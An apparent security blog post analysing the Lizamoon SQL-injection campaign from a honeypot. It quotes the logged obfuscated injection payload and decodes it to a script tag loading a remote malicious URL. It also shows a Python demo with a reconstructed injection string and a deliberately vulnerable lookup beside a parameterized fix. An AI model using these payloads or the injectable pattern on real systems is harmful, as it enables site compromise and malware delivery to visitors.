The past 10 days have seen a big increase in Lizamoon activity. Stories about Lizamoon have reported anything from a few thousand sites being attacked to 1.5 million. Some of the sites attacked have been high profile.
So, what does Lizamoon really do?
I set up a honeypot site on a Windows Server 2003 machine running IIS. The site was attacked via an HTTP GET request aimed at an ASP page that built its SQL query from an unvalidated query-string parameter. Afterwards a note field in the database contained an injected string of text. This is the relevant line from the IIS log:
2011-03-29 12:17:02 192.168.0.25 GET /sub-folder/page.asp rec_id=3251681+update+table_1+set+field_1=REPLACE(cast(field_1+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(108)%2Bchar(105)%2Bchar(122)%2Bchar(97)%2Bchar(109)%2Bchar(111)%2Bchar(111)%2Bchar(110)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--|49|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. - 95.64.9.18 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax) - - www.domain.co.uk 500 2709 1017 9921
You can see that the request came from 95.64.9.18. The rec_id value is a genuine-looking integer followed by a complete UPDATE statement, so the query the page builds around it reached SQL Server as a batch of two statements, and the second ran against every row of table_1. The cast(char(60)+char(47)+...) expression is an obfuscated string literal: decoding the char() codes gives </title><script src=http://lizamoon.com/ur.php></script> (the leading </title> closes a title element in case the field is rendered inside one, so the script tag is not swallowed by it). REPLACE takes the field, a pattern and a replacement; here the pattern is that tag and the replacement is char(32), a single space, so this particular request swaps the tag for a space wherever it already appears in field_1 rather than writing it in. The |49|800a0bcd|Either_BOF_or_EOF_is_True... tail is not part of the request: IIS appends the ASP error (script line, error code, message) to the logged query string when the page fails. The lookup for rec_id 3251681 found no record, so line 49 of page.asp failed and the client got a 500, but SQL Server executes the whole batch regardless of what the script then does with the empty recordset. A 500 in the log is no evidence that the injection failed.
The injected SQL ends with --, the T-SQL end-of-line comment marker, so anything the page appends to the query after the rec_id value is commented out and cannot break the attacker's syntax.
This style of attack is prevented by parameterized statements and type checking: rec_id is an integer, so the page should reject any value that is not one, and it should hand the value to SQL Server as a bound parameter rather than pasting it into the query text, so the database never parses user input as SQL.
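The same injected value run through both code paths, as an added example that is not the honeypot's code: SQLite stands in for SQL Server (so statements are separated with ";" and char() takes a list of code points instead of being joined with "+"), and the notes table, the stored note and the lookup_vulnerable / lookup_safe functions are constructed for the illustration. The injected string mirrors the logged request: a plausible integer, an UPDATE whose literal is built from char() codes, and a trailing "--".

```python
import re
import sqlite3

# The script tag the logged request builds with char(); here it is what the
# injected UPDATE appends to every note.
TAG = "</title><script src=http://lizamoon.com/ur.php></script>"

# Attacker-controlled value of the rec_id query-string parameter (constructed,
# SQLite dialect): integer, stacked UPDATE built from char() codes, comment.
INJECTED_REC_ID = (
    "3251681; UPDATE notes SET body = body || char("
    + ",".join(str(ord(c)) for c in TAG)
    + ") --"
)


def fresh_db():
    """In-memory notes table with one constructed row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE notes (rec_id INTEGER PRIMARY KEY, body TEXT)")
    conn.execute("INSERT INTO notes VALUES (1, 'Hello from the honeypot')")
    conn.commit()
    return conn


def lookup_vulnerable(conn, rec_id_from_request):
    """The page.asp pattern: the raw query-string value is pasted into the SQL
    text and the whole string goes to the database. executescript() stands in
    for ADO/SQL Server executing every statement in the batch."""
    sql = "SELECT body FROM notes WHERE rec_id = " + rec_id_from_request
    conn.executescript(sql)


def parse_rec_id(raw):
    """Type check: rec_id is an integer key, so anything that is not a short
    run of digits is rejected before it gets anywhere near the database."""
    if not re.fullmatch(r"[0-9]{1,9}", raw):
        raise ValueError("rec_id must be a positive integer")
    return int(raw)


def lookup_safe(conn, rec_id_from_request):
    """Parameterized statement: the value travels as a bound parameter, so the
    database never parses it as SQL, and it has already been type-checked."""
    rec_id = parse_rec_id(rec_id_from_request)
    row = conn.execute("SELECT body FROM notes WHERE rec_id = ?", (rec_id,)).fetchone()
    return row[0] if row else None


def body_of(conn, rec_id=1):
    """What is currently stored in the note (used to show the side effect)."""
    return conn.execute("SELECT body FROM notes WHERE rec_id = ?", (rec_id,)).fetchone()[0]


def run_demo():
    """Send the injected value down both paths and report the stored note."""
    results = {}

    conn = fresh_db()
    lookup_vulnerable(conn, INJECTED_REC_ID)   # SELECT finds nothing, UPDATE still runs
    results["vulnerable_body"] = body_of(conn)

    conn = fresh_db()
    try:
        lookup_safe(conn, INJECTED_REC_ID)
        results["safe_rejected"] = False
    except ValueError:
        results["safe_rejected"] = True
    results["safe_body"] = body_of(conn)       # untouched
    results["safe_lookup"] = lookup_safe(conn, "1")
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value!r}")
```

In classic ASP the safe path is CLng() on Request.QueryString("rec_id") inside an error check, plus an ADODB.Command whose Parameters collection carries the value, instead of string concatenation into the CommandText. The type check alone would already have stopped this request, since the payload is not a number; the bound parameter is what stops the next variant that targets a string column.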